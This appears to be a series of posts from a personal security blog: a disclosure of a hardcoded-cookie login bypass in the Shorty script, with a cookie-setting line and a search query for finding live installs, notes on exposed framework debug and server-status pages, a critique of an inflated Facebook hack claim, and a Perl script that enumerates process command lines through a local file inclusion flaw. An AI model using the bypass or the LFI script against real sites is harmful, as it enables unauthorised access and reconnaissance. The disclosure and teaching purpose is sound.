Shorty Authentication Bypass

(This post was posted originally at my personal own blog and also featured in the exploit-db.com website)

Today, reading some stuff at internet I have found an article about 7 PHP scripts to generate shorts URLs. This kind of links are very common today with a lot of controversy about the security risk that they implied. I’m not here (now) to discuss about shorting URL’s services but to talk about a stupid bug that I have found in the first (!!!) software that WebResourcesDepot recommend today.

Shorty is a script very old… From 2006. Why are they recommending it in the first place? Second: Did they try to install it? A lot of errors appears when you try a fresh install and some pain until you can fix it. Buggy from the scratch.

I then decided to read some source code. I have found that in functions.php is some bug that we can use to bypass the login form. Let's go to read some php code:

function authenticate(){
    $cookie = @$_COOKIE['snickerdoodle'];
    if($cookie == "polarbears"){
        //
    } else {
        exit("Not logged in.");
    }
}

function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}

As you can read this code generates a cookie with the name “snickerdoodle” and the value “polarbears” to determine if you are authenticated or not. Its very easy to create a new cookie into your browser with this data with some Firefox extension. If you are using a browser without extensions like Google Chrome you can try to write the next javascript sentence into your URL:

javascript:document.cookie=”snickerdoodle=polerbears”;

If you don’t want to install Shorty (and mess around with all the hacks you have to do use it) you can always use the search intitle:”Shorty (Beta)” to found some places to test it.

Have fun!

The danger of the default files

(This post was originally posted in my own personal blog)

During my current research I have found some default files that some web frameworks includes into their installations that can compromise the security of a website. It also can allow an attacker to determine which framework a web page is using.

The first of these files is from the symfony framework. They offer to the developers a useful script called frontend_dev.php which show internal information about the current install and the server. As you can see in the following screenshot the information can be very useful…



It’s deactivated by default and can be activated changing the “lib\config\config\settings.yml” file:

# Logging and debugging settings

web_debug: false # Enable the web debug toolbar

By default the framework is configure not to show the toolbar, but a lot of web pages (indexed by Google) have activate it and allow to any user to read the private data of their websites.



Moreover another default files that I found researching into the default Zend Server installation are the alias /server-info and /server-status. These are part of the mod_info module and, hopefully, in Zend Server, are configured to be access only from localhost:

<Location>
SetHandler server-info
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

<Location>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

This is a secure default configuration that other domains using this Apache module should adopt for the security of their web pages. This is a problem discussed sometimes ago with the revelation of the /server-status file in twitter.com. It’s also known that other servers like Apache.org are offering his status and his info, but you can also found a lot of websites sharing their server-status and server-info pages.

I have found that these default files are not include in the wordlist of wfuzz or even Wikto. I don’t know why are they ignoring these files, but I’m going to add these to my default dictionaries files :)

Cheers!

Pentura is Delicious!!!

Well... maybe I did the easy joke, but I couldn't resists!!!

I had never use any kind of bookmarks, even local ones. I try to remember the links or at least the keywords of the article or post to be able to localize it later using Bing or Google. But today I change something in my life... well, at least in my working life :P I'm starting to use bookmarks!

I added a small box in the right of the blog showing the RSS of the new delicious account I created for Pentura to store all these links about security I consider interesting around the web. Some of them will be in Spanish (I'm sorry...) but you can easily translate them using online translators :)

I also added my personal twitter account, where you can follow my public timeline with funny security jokes, thoughts about how stupid can be sometimes the bugs I found and maybe personal stuff between friends around the world. Again I'll try to keep it in English, but sometimes replies goes in Spanish.

Bye!

Web security news and the "Hack of the Year"

Long time since my last post but I was a bit busy on customer on-site testing. Nice days of application testing but now is time to write here again.

I read long ago a fantastic book about security named "The Art Of Intrusion" wrote by the (in)famous Kevin Mitnick. He told amazing histories about security and intrusions without giving too much technical details about them but the enough to understand the attack and catch the idea behind the security problem the system had. News about security are (sometimes) the same. I said "sometimes" because reporters who wrote about security doesn't really use to know anything about security, but this is something to another post...

Today I want to introduce you two websites about web security / cracking. The first one is a website that intends to collect all these web security incidents around the world. It's called The Web Hacking Incident Database and offers reports of the hacked websites around the world, including, in most of the cases, some technical information. It's worth a lecture to understand how important is the web security nowadays.

The other one is really a clone of the famous milw0rm website (I'm not going to link it because is currently abandoned) called Inj3ctor.They published a few days ago a paper claiming that they had hacked Facebook. Wooohhh... really? Let's go check the report:

• They start doing a port scan of facebook.com
• After that they do some simple Google search queries trying to identify some PHP errors because is well know that Facebook is developed in this language.
• A quick look into the robots.txt file can focus us into specific (and usually privates) web pages.
• After these tests against facebook.com they move to apps.facebook.com and detect some vulnerabilities in third parties applications. These applications are not developed by Facebook and are not hosted in the Facebook servers.

They got a lot of information from MySQL databases using simple SQL Injections and claim that the information they obtained is from Facebook. Ok, sometimes people get really excited too soon. In this case the called it: "Hack of the year!".

If you are going to call something the "Hack of the year" be sure it is... Because:

1. Facebook doesn't use MySQL, they use Cassandra.
2. The path showed in the PHP errors points clearly to another server (http://tomkincaid.dreamhosters.com/)
3. Wordpress? I'm pretty sure that is not any Wordpress installation running in the Facebook servers.
4. Don't say your exploit is the "Hack of the year", wait until the community say it: http://pwnie-awards.org/

That's all for now, more other day with an exciting project I want to release in any point next week :) Cheers!

Process command line enumeration using LFI

This week during a pentest I discovered a website vulnerable to Local File Inclusion vulnerability. As I wanted to discover the most information possible about the system I decided to retrieve the running process and the command line used to execute these programs. With this I pretended to discover more services and paths in the system.

I wrote a very simple Perl program that can be modified very easily to other scenarios :)

#!/usr/bin/perl -w
use LWP;
my $browser = LWP::UserAgent->new;
my $url = 'https://URL/load?file=../../proc/';
for($i = 0; $i < 9500; $i++){
my $response = $browser->get( $url.$i."/cmdline" );
if($response->content !~ m/^$/i) {
print $i . " : " . $response->content ."\n";
}
}

Enjoy!